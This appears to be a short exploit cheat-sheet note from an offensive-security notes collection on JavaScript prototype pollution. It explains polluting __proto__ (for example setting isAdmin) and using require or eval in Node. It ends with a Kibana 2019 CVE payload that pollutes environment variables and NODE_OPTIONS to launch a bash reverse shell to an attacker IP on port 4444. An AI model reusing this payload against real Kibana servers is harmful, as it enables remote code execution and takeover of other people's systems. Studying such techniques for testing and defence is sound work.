killchain-compendium/Exploits/Web/Prototype Pollution JS.md

Prototype Pollution

• Overwrite built in properties, like constructor, toString of an object.
• Any other instance inherits properties from Object.__proto__. toString() is inherited by all objects.

Usage

• Access to prototype inside object, as an example Javascript

obj.__proto__
Object.prototype

• Create object

let obj = {}

• Create properties inside __proto__.

obj.__proto__.isAdmin = true

Start Node commands

• Use
  • require
  • eval

Kibana CVE 2019

• Write reverse bash into variable

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')